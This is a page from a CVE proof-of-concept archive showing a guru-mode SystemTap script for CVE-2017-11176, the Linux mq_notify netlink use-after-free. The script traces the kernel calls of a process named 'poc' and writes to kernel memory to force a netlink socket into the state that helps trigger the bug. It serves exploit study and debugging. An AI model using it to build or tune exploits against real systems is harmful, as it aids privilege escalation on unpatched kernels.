4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-11176
README.md
Rendering markdown...
POC / spy.stp STP
⬇ Raw GitHub ✕ Close 
//-g option : guru mode  --  write your own kernel code and load them at runtime
//use %{}% to contant your code
//

%{
#include <net/sock.h>
#include <linux/rhashtable.h>
#include <linux/atomic.h>
#include <linux/workqueue.h>
#include <net/sock.h>
struct netlink_ring {
	void			**pg_vec;
	unsigned int		head;
	unsigned int		frames_per_block;
	unsigned int		frame_size;
	unsigned int		frame_max;

	unsigned int		pg_vec_order;
	unsigned int		pg_vec_pages;
	unsigned int		pg_vec_len;

	atomic_t		pending;
};
struct netlink_sock {
	/* struct sock has to be the first member of netlink_sock */
	struct sock		sk;
	u32			portid;
	u32			dst_portid;
	u32			dst_group;
	u32			flags;
	u32			subscriptions;
	u32			ngroups;
	unsigned long		*groups;
	unsigned long		state;
	size_t			max_recvmsg_len;
	wait_queue_head_t	wait;
	bool			bound;
	bool			cb_running;
	struct netlink_callback	cb;
	struct mutex		*cb_mutex;
	struct mutex		cb_def_mutex;
	void			(*netlink_rcv)(struct sk_buff *skb);
	int			(*netlink_bind)(struct net *net, int group);
	void			(*netlink_unbind)(struct net *net, int group);
	struct module		*module;
#ifdef CONFIG_NETLINK_MMAP
	struct mutex		pg_vec_lock;
	struct netlink_ring	rx_ring;
	struct netlink_ring	tx_ring;
	atomic_t		mapped;
#endif /* CONFIG_NETLINK_MMAP */

	struct rhash_head	node;
	struct rcu_head		rcu;
	struct work_struct	work;
};
%}

//hook function
//when using hook function,what should be notified is:
//the hook function's param should be the hooked function's param
//for example,here i want to add a hook in netlink_attachskb function
//focaus on its defination:netlink_attachskb(struct sock *sk, struct sk_buff *skb,long *timeo, struct sock *ssk)
//so,only the above four params(sk,skb,timeo and ssk) could be the hook function's parm

function dump_netlink_sock:long (arg_sock:long)
%{
    struct sock *sk = (void*) STAP_ARG_arg_sock;
    struct netlink_sock *nlk = (void*) sk;

    _stp_printf("-={ dump_netlink_sock: %p }=-\n", nlk);
    _stp_printf("- sk = %p\n", sk);
    _stp_printf("- sk->sk_rmem_alloc = %d\n", sk->sk_rmem_alloc);
    _stp_printf("- sk->sk_rcvbuf = %d\n", sk->sk_rcvbuf);
    _stp_printf("- sk->sk_refcnt = %d\n", sk->sk_refcnt);
    _stp_printf("- (before) nlk->state = %x\n", (nlk->state & 0x1));
    nlk->state |= 1;                                                
    _stp_printf("- (after) nlk->state = %x\n", (nlk->state & 0x1));
    _stp_printf("- (before)sk->sk_flags = %x\n", sk->sk_flags);
    _stp_printf("- SOCK_DEAD = %x\n", SOCK_DEAD);
    //sk->sk_flags |= 1;
    _stp_printf("- (after)sk->sk_flags = %x\n", sk->sk_flags);
    _stp_printf("-={ dump_netlink_sock: END}=-\n");
%}


probe syscall.mq_notify
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [syscall] >>> mq_notify (%s)\n",pid(),tid(),argstr)
    }
}

probe kernel.function("netlink_getsockbyfilp")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [netlink_getsockbyfilp] >>> netlink_getsockbyfilp %s\n",pid(),tid(),$$parms)
    }
}

probe kernel.function("netlink_getsockbyfilp").return
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [netlink_getsockbyfilp] <<< netlink_getsockbyfilp %s\n",pid(),tid(),$$return)
    }
}


probe kernel.function("netlink_attachskb")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [netlink_attachskb] >>> netlink_attachskb %s\n",pid(),tid(),$$parms)
        dump_netlink_sock($sk)
        count += 1
        printf("count:%d\n",count)
    }
}



probe kernel.function("netlink_attachskb").return
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [netlink_attachskb] <<< netlink_attachskb %s\n",pid(),tid(),$$return)
    }
}

probe kernel.function ("__fdget")
{
    if (execname() == "poc")
    {
        printf("(%d-%d) [vfs] ==>> __fdget (%s)\n", pid(), tid(), $$parms)
    }
}

probe syscall.mq_notify.return
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [syscall] <<< mq_notify = %x\n\n",pid(),tid(),$return)
        printf("--------------------------------------------------------\n")
    }
}

probe kernel.function("netlink_detachskb").return
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [netlink_detachskb] <<< netlink_detachskb %s\n\n",pid(),tid(),$$parms)
        //printf("- leave [netlink_detachskb] <<<-\n")
    }
}






probe kernel.function("copy_from_user")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [userland] >>> copy_from_user %s\n",pid(),tid(),$$parms)
    }
}

probe syscall.setsockopt
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [syscall] >>> netlink_setsockopt %s\n",pid(),tid(),$$parms)
    }
}

probe syscall.setsockopt.return
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [syscall] <<< netlink_setsockopt = %x\n",pid(),tid(),$return)
    }
}


probe kernel.function("signal_pending")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [signal_pending] >>> signal_pending %s\n",pid(),tid(),$$parms)
    }
}


probe kernel.function("__close_fd")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [__close_fd] >>> __close_fd %s\n",pid(),tid(),$$parms)
    }
}

probe kernel.function("kfree_skb")
{
    if(execname()=="poc")
    {
        printf("(%d-%d) [kfree_skb] >>> kfree_skb %s\n",pid(),tid(),$$parms)
    }
}